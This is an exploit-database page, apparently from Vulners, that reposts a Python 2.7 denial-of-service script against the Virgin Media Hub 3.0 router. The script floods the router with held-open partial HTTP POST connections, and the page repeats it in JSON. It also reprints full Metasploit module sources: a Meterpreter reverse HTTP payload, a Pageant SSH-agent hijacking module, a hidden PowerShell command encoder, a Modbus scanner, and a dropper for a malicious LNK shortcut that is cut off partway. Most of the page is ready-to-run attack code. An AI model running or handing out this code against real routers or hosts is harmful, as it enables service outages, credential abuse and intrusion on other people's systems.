Search...

Virgin Media Hub 3.0 Router - Denial of Service Exploit

2018-11-05T00:00:00

ID 1337DAY-ID-31531
Type zdt
Reporter Ross Inman
Modified 2018-11-05T00:00:00

Description

Exploit for hardware platform in category dos / poc

                                        
                                            # Exploit Title: Virgin Media Hub 3.0 Router - Denial of Service (PoC)
# Exploit Author: Ross Inman
# Vendor Homepage: https://www.broadbandchoices.co.uk/guides/hardware/virgin-media-broadband-routers
# Software Link: N/A
# Version: Virgin Media Hub 3.0
# Tested on: Linux
# CVE : N/A
 
#!/usr/bin/python2.7
 
import socket, sys, random, os
 
user_agents = [
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]
 
def connection(ip,port):
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(1)
    test = s.connect_ex((ip,port))
    s.close()
    if(test == 0):
        return True
    else:
        return False
 
def dos(ip,port):
    socks = []
    payload = """
POST / HTTP/1.1\
Host: {}
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: {}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
        """.format(ip,random.choice(user_agents))
    with open("/tmp/payload.txt","w") as f:
        f.write(payload)
        f.close()
    with open("/tmp/payload.txt","r") as f:
        lines = f.readlines()
        f.close()
    os.remove("/tmp/payload.txt")
    while(True):
        try:
            sys.stdout.write("\r[Info]Sending packets =&gt; {}".format(ip))
            s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            s.connect((ip,port))
            for line in lines:
                s.send(line)
            socks.append(s)
        except KeyboardInterrupt:
            print"\n[Info]Closing connections..."
            for sock in socks:
                sock.close()
                socks.remove(sock)
            sys.exit(0)
 
def main():
    if(len(sys.argv) != 3):
        sys.exit("Usage: ./dos.py {target ip} {port}")
    else:
        target = sys.argv[1]
        port = int(sys.argv[2])
    print"[Info]Checking connection to target..."
    check = connection(target,port)
    if(not check):
        sys.exit("[Failure]Connection to target failed.")
    print"[Info]Starting attack on: {}".format(target)
    dos(target,port)
 
if(__name__ == "__main__"):
    main()

#  0day.today [2018-11-06]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-31531", "bulletinFamily": "exploit", "title": "Virgin Media Hub 3.0 Router - Denial of Service Exploit", "description": "Exploit for hardware platform in category dos / poc", "published": "2018-11-05T00:00:00", "modified": "2018-11-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/31531", "reporter": "Ross Inman", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-11-06T22:49:11", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "f64239e1f5667d753ba8ad549134d76b"}, {"key": "href", "hash": "ec1c7205ad138c8ea0c7d926745cb246"}, {"key": "modified", "hash": "a2d8013d77dceb787394859439f405fa"}, {"key": "published", "hash": "a2d8013d77dceb787394859439f405fa"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "1d4c7d4b77f3222d54785d9c22dc332d"}, {"key": "sourceData", "hash": "b962f4fa290ef96ff2700ebb48ffce91"}, {"key": "sourceHref", "hash": "de4e246a0397533264d14f5a2efb56de"}, {"key": "title", "hash": "03b40d65c505ac4658d7444018f07640"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "1e94a7c447c029012ec1a87f9b08b1b185722ee8d741e1e1089a47cb013d2954", "viewCount": 111, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-11-06T22:49:11"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31531", "SECURITYVULNS:VULN:14155"]}, {"type": "zdt", "idList": ["1337DAY-ID-14155", "1337DAY-ID-4701"]}], "modified": "2018-11-06T22:49:11"}, "vulnersScore": -0.2}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/31531", "sourceData": "# Exploit Title: Virgin Media Hub 3.0 Router - Denial of Service (PoC)\r\n# Exploit Author: Ross Inman\r\n# Vendor Homepage: https://www.broadbandchoices.co.uk/guides/hardware/virgin-media-broadband-routers\r\n# Software Link: N/A\r\n# Version: Virgin Media Hub 3.0\r\n# Tested on: Linux\r\n# CVE : N/A\r\n \r\n#!/usr/bin/python2.7\r\n \r\nimport socket, sys, random, os\r\n \r\nuser_agents = [\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14\",\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50\",\r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393\"\r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0\",\r\n \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0\",\r\n \"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\",\r\n \"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\",\r\n \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\",\r\n \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0\",\r\n]\r\n \r\ndef connection(ip,port):\r\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n s.settimeout(1)\r\n test = s.connect_ex((ip,port))\r\n s.close()\r\n if(test == 0):\r\n return True\r\n else:\r\n return False\r\n \r\ndef dos(ip,port):\r\n socks = []\r\n payload = \"\"\"\r\nPOST / HTTP/1.1\\\r\nHost: {}\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: {}\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n \"\"\".format(ip,random.choice(user_agents))\r\n with open(\"/tmp/payload.txt\",\"w\") as f:\r\n f.write(payload)\r\n f.close()\r\n with open(\"/tmp/payload.txt\",\"r\") as f:\r\n lines = f.readlines()\r\n f.close()\r\n os.remove(\"/tmp/payload.txt\")\r\n while(True):\r\n try:\r\n sys.stdout.write(\"\\r[Info]Sending packets => {}\".format(ip))\r\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n s.connect((ip,port))\r\n for line in lines:\r\n s.send(line)\r\n socks.append(s)\r\n except KeyboardInterrupt:\r\n print\"\\n[Info]Closing connections...\"\r\n for sock in socks:\r\n sock.close()\r\n socks.remove(sock)\r\n sys.exit(0)\r\n \r\ndef main():\r\n if(len(sys.argv) != 3):\r\n sys.exit(\"Usage: ./dos.py {target ip} {port}\")\r\n else:\r\n target = sys.argv[1]\r\n port = int(sys.argv[2])\r\n print\"[Info]Checking connection to target...\"\r\n check = connection(target,port)\r\n if(not check):\r\n sys.exit(\"[Failure]Connection to target failed.\")\r\n print\"[Info]Starting attack on: {}\".format(target)\r\n dos(target,port)\r\n \r\nif(__name__ == \"__main__\"):\r\n main()\n\n# 0day.today [2018-11-06] #"}

{"metasploit": [{"lastseen": "2019-11-06T06:07:46", "bulletinFamily": "exploit", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "modified": "2019-05-21T17:40:27", "published": "2017-03-21T09:38:18", "id": "MSF:PAYLOAD/LINUX/MIPS64/METERPRETER_REVERSE_HTTP", "href": "", "type": "metasploit", "title": "Linux Meterpreter, Reverse HTTP Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_http'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_mips64_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1580448\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPS64,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseHttp,\n 'Session' => Msf::Sessions::Meterpreter_mips64_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'http',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb"}, {"lastseen": "2020-01-15T22:34:55", "bulletinFamily": "exploit", "description": "This module forwards SSH agent requests from a local socket to a remote Pageant instance. If a target Windows machine is compromised and is running Pageant, this will allow the attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are tunneled through the meterpreter session. This could therefore be used to authenticate with a remote host using a private key which is loaded into a remote user's Pageant instance, without ever having knowledge of the private key itself. Note that this requires the PageantJacker meterpreter extension, but this will be automatically loaded into the remote meterpreter session by this module if it is not already loaded.\n", "modified": "2017-09-17T20:00:04", "published": "2015-05-19T08:49:27", "id": "MSF:POST/WINDOWS/MANAGE/FORWARD_PAGEANT", "href": "", "type": "metasploit", "title": "Forward SSH Agent Requests To Remote Pageant", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Priv\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Forward SSH Agent Requests To Remote Pageant',\n 'Description' => %q{\n This module forwards SSH agent requests from a local socket to a remote Pageant instance.\n If a target Windows machine is compromised and is running Pageant, this will allow the\n attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are\n tunneled through the meterpreter session. This could therefore be used to authenticate\n with a remote host using a private key which is loaded into a remote user's Pageant instance,\n without ever having knowledge of the private key itself.\n\n Note that this requires the PageantJacker meterpreter extension, but this will be automatically\n loaded into the remote meterpreter session by this module if it is not already loaded.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>',\n 'Ben Campbell', # A HUGE amount of support in this :-)\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n register_options(\n [\n OptString.new('SocketPath', [false, 'Specify a filename for the local UNIX socket.', nil])\n ])\n end\n\n def setup\n unless session.extapi\n vprint_status(\"Loading extapi extension...\")\n begin\n session.core.use(\"extapi\")\n rescue Errno::ENOENT\n print_error(\"This module is only available in a windows meterpreter session.\")\n return\n end\n end\n end\n\n\n def run\n # Check to ensure that UNIX sockets are supported\n begin\n ::UNIXServer\n rescue NameError\n print_error(\"This module is only supported on a Metasploit installation that supports UNIX sockets.\")\n return false\n end\n\n # Get the socket path from the user supplied options (or leave it blank to get the plugin to choose one)\n if datastore['SocketPath']\n @sockpath = datastore['SocketPath'].to_s\n else\n @sockpath = \"#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('pageantjacker', 5)}\"\n end\n\n # Quit if the file exists, so that we don't accidentally overwrite something important on the host system\n if ::File.exist?(@sockpath)\n print_error(\"Your requested socket (#{@sockpath}) already exists. Remove it or choose another path and try again.\")\n return false\n end\n\n # Open the socket and start listening on it. Essentially now forward traffic between us and the remote Pageant instance.\n ::UNIXServer.open(@sockpath) do |serv|\n print_status(\"Launched listening socket on #{@sockpath}\")\n print_status(\"Set SSH_AUTH_SOCK variable to #{@sockpath} (e.g. export SSH_AUTH_SOCK=\\\"#{@sockpath}\\\")\")\n print_status(\"Now use any tool normally (e.g. ssh-add)\")\n\n loop do\n s = serv.accept\n loop do\n socket_request_data = s.recvfrom(8192) # 8192 = AGENT_MAX\n break if socket_request_data.nil? || socket_request_data.first.nil? || socket_request_data.first.empty?\n vprint_status(\"PageantJacker: Received data from socket (size: #{socket_request_data.first.size})\")\n response = session.extapi.pageant.forward(socket_request_data.first, socket_request_data.first.size)\n if response[:success]\n begin\n s.send response[:blob], 0\n rescue\n break\n end\n vprint_status(\"PageantJacker: Response received (Success='#{response[:success]}' Size='#{response[:blob].size}' Error='#{translate_error(response[:error])}')\")\n else\n print_error(\"PageantJacker: Unsuccessful response received (#{translate_error(response[:error])})\")\n end\n end\n end\n end\n end\n\n def cleanup\n # Remove the socket that we created, if it still exists\n ::File.delete(@sockpath) if ::File.exist?(@sockpath) if @sockpath\n end\n\n def translate_error(errnum)\n errstring = \"#{errnum}: \"\n case errnum\n when 0\n errstring += \"No error\"\n when 1\n errstring += \"The Pageant request was not processed.\"\n when 2\n errstring += \"Unable to obtain IPC memory address.\"\n when 3\n errstring += \"Unable to allocate memory for Pageant<-->Meterpreter IPC.\"\n when 4\n errstring += \"Unable to allocate memory buffer.\"\n when 5\n errstring += \"Unable to build Pageant request string.\"\n when 6\n errstring += \"Pageant not found.\"\n when 7\n errstring += \"Not forwarded.\"\n else\n errstring += \"Unknown.\"\n end\n errstring\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/manage/forward_pageant.rb"}, {"lastseen": "2019-12-02T08:36:10", "bulletinFamily": "exploit", "description": "This encodes the command as a base64 encoded command for powershell.\n", "modified": "2017-07-24T13:26:21", "published": "2014-02-08T19:09:57", "id": "MSF:ENCODER/CMD/POWERSHELL_BASE64", "href": "", "type": "metasploit", "title": "Powershell Base64 Command Encoder", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Encoder\n Rank = ExcellentRanking\n\n def initialize\n super(\n 'Name' => 'Powershell Base64 Command Encoder',\n 'Description' => %q{\n This encodes the command as a base64 encoded command for powershell.\n },\n 'Author' => 'Ben Campbell',\n 'Arch' => ARCH_CMD,\n 'Platform' => 'win')\n end\n\n\n #\n # Encodes the payload\n #\n def encode_block(state, buf)\n\n # Skip encoding for empty badchars\n if state.badchars.length == 0\n return buf\n end\n\n if (state.badchars.include? '-') || (state.badchars.include? ' ')\n return buf\n end\n\n cmd = encode_buf(buf)\n\n if state.badchars.include? '='\n while cmd.include? '='\n buf << \" \"\n cmd = encode_buf(buf)\n end\n end\n\n cmd\n end\n\n def encode_buf(buf)\n base64 = Rex::Text.encode_base64(Rex::Text.to_unicode(\"cmd.exe /c start #{buf}\"))\n cmd = \"powershell -w hidden -nop -e #{base64}\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/encoders/cmd/powershell_base64.rb"}, {"lastseen": "2019-12-22T01:34:24", "bulletinFamily": "exploit", "description": "This module detects the Modbus service, tested on a SAIA PCD1.M2 system. Modbus is a clear text protocol used in common SCADA systems, developed originally as a serial-line (RS232) async protocol, and later transformed to IP, which is called ModbusTCP.\n", "modified": "2017-07-24T13:26:21", "published": "2012-06-05T18:50:53", "id": "MSF:AUXILIARY/SCANNER/SCADA/MODBUSDETECT", "href": "", "type": "metasploit", "title": "Modbus Version Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Modbus Version Scanner',\n 'Description' => %q{\n This module detects the Modbus service, tested on a SAIA PCD1.M2 system.\n Modbus is a clear text protocol used in common SCADA systems, developed\n originally as a serial-line (RS232) async protocol, and later transformed to IP,\n which is called ModbusTCP.\n },\n 'References' =>\n [\n [ 'URL', 'http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx' ],\n [ 'URL', 'http://en.wikipedia.org/wiki/Modbus:TCP' ]\n ],\n 'Author' => [ 'EsMnemon <esm[at]mnemonic.no>' ],\n 'DisclosureDate' => 'Nov 1 2011',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(502),\n OptInt.new('UNIT_ID', [true, \"ModBus Unit Identifier, 1..255, most often 1 \", 1]),\n OptInt.new('TIMEOUT', [true, 'Timeout for the network probe', 10])\n ])\n end\n\n def run_host(ip)\n # read input register=func:04, register 1\n sploit=\"\\x21\\x00\\x00\\x00\\x00\\x06\\x01\\x04\\x00\\x01\\x00\\x00\"\n sploit[6] = [datastore['UNIT_ID']].pack(\"C\")\n connect()\n sock.put(sploit)\n data = sock.get_once\n\n # Theory: When sending a modbus request of some sort, the endpoint will return\n # with at least the same transaction-id, and protocol-id\n if data\n if data[0,4] == \"\\x21\\x00\\x00\\x00\"\n print_good(\"#{ip}:#{rport} - MODBUS - received correct MODBUS/TCP header (unit-ID: #{datastore['UNIT_ID']})\")\n else\n print_error(\"#{ip}:#{rport} - MODBUS - received incorrect data #{data[0,4].inspect} (not modbus/tcp?)\")\n end\n else\n vprint_status(\"#{ip}:#{rport} - MODBUS - did not receive data.\")\n end\n\n disconnect()\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/scada/modbusdetect.rb"}, {"lastseen": "2020-01-05T15:47:51", "bulletinFamily": "exploit", "description": "This module drops a shortcut (LNK file) that has a ICON reference existing on the specified remote host, causing SMB and WebDAV connections to be initiated from any user that views the shortcut.\n", "modified": "2017-07-24T13:26:21", "published": "2012-02-16T18:34:19", "id": "MSF:POST/WINDOWS/ESCALATE/DROPLNK", "href": "", "type": "metasploit", "title": "Windows Escalate SMB Icon LNK Dropper", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Escalate SMB Icon LNK Dropper',\n 'Description' => %q{\n This module drops a shortcut (LNK file) that has a ICON reference\n existing on the specified remote host, causing SMB and WebDAV\n connections to be initiated from any user that views the shortcut.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'mubix' ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n register_options(\n [\n OptAddress.new(\"LHOST\", [ true, \"Host listening for incoming SMB/WebDAV traffic\", nil]),\n OptString.new(\"LNKFILENAME\", [ true, \"Shortcut's filename\", \"Words.lnk\"]),\n OptString.new(\"SHARENAME\", [ true, \"Share name on LHOST\", \"share1\"]),\n OptString.new(\"ICONFILENAME\", [ true, \"File name on LHOST's share\", \"icon.png\"])\n ])\n end\n\n def run\n print_status \"Creating evil LNK\"\n lnk = \"\"\n lnk << \"\\x4c\\x00\\x00\\x00\" #Header size\n lnk << \"\\x01\\x14\\x02\\x00\\x00\\x00\\x00\\x00\" #Link CLSID\n lnk << \"\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x46\"\n lnk << \"\\xdb\\x00\\x00\\x00\" #Link flags\n lnk << \"\\x20\\x00\\x00\\x00\" #File attributes\n lnk << \"\\x30\\xcd\\x9a\\x97\\x40\\xae\\xcc\\x01\" #Creation time\n lnk << \"\\x30\\xcd\\x9a\\x97\\x40\\xae\\xcc\\x01\" #Access time\n lnk << \"\\x30\\xcd\\x9a\\x97\\x40\\xae\\xcc\\x01\" #Write time\n lnk << \"\\x00\\x00\\x00\\x00\" #File size\n lnk << \"\\x00\\x00\\x00\\x00\" #Icon index\n lnk << \"\\x01\\x00\\x00\\x00\" #Show command\n lnk << \"\\x00\\x00\" #Hotkey\n lnk << \"\\x00\\x00\" #Reserved\n lnk << \"\\x00\\x00\\x00\\x00\" #Reserved\n lnk << \"\\x00\\x00\\x00\\x00\" #Reserved\n lnk << \"\\x7b\\x00\" #IDListSize\n #sIDList\n lnk << \"\\x14\\x00\\x1f\\x50\\xe0\\x4f\\xd0\\x20\"\n lnk << \"\\xea\\x3a\\x69\\x10\\xa2\\xd8\\x08\\x00\"\n lnk << \"\\x2b\\x30\\x30\\x9d\\x19\\x00\\x2f\"\n lnk << \"C:\\\\\"\n lnk << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n lnk << \"\\x00\\x00\\x00\\x4c\\x00\\x32\\x00\\x00\\x00\\x00\\x00\\x7d\\x3f\\x5b\\x15\\x20\"\n lnk << \"\\x00\"\n lnk << \"AUTOEXEC.BAT\"\n lnk << \"\\x00\\x00\\x30\\x00\\x03\\x00\\x04\\x00\\xef\\xbe\\x7d\\x3f\\x5b\\x15\\x7d\\x3f\"\n lnk << \"\\x5b\\x15\\x14\\x00\\x00\\x00\"\n lnk << Rex::Text.to_unicode(\"AUTOEXEC.BAT\")\n lnk << \"\\x00\\x00\\x1c\\x00\\x00\\x00\"\n #sLinkInfo\n lnk << \"\\x3e\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x01\\x00\"\n lnk << \"\\x00\\x00\\x1c\\x00\\x00\\x00\\x2d\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3d\\x00\"\n lnk << \"\\x00\\x00\\x11\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x3e\\x77\\xbf\\xbc\\x10\\x00\"\n lnk << \"\\x00\\x00\\x00\"\n lnk << \"C:\\\\AUTOEXEC.BAT\"\n lnk << \"\\x00\\x00\\x0e\\x00\"\n #RELATIVE_PATH\n lnk << Rex::Text.to_unicode(\".\\\\AUTOEXEC.BAT\")\n lnk << \"\\x03\\x00\"\n #WORKING_DIR\n lnk << Rex::Text.to_unicode(\"C:\\\\\")\n #ICON LOCATION\n lnk << \"\\x1c\\x00\"\n lnk << Rex::Text.to_unicode(\"\\\\\\\\#{datastore['LHOST']}\\\\#{datastore['SHARENAME']}\\\\#{datastore['ICONFILENAME']}`\")\n lnk << \"\\x00\\x00\\x03\\x00\\x00\\xa0\\x58\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n lnk << \"computer\"\n lnk << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x26\\x4e\\x06\\x19\\xf2\\xa9\\x31\\x40\\x91\\xf0\"\n lnk << \"\\xab\\x9f\\xb6\\xb1\\x6c\\x84\\x22\\x03\\x57\\x01\\x5e\\x1d\\xe1\\x11\\xb9\\x48\"\n lnk << \"\\x08\\x00\\x27\\x6f\\xe3\\x1f\\x26\\x4e\\x06\\x19\\xf2\\xa9\\x31\\x40\\x91\\xf0\"\n lnk << 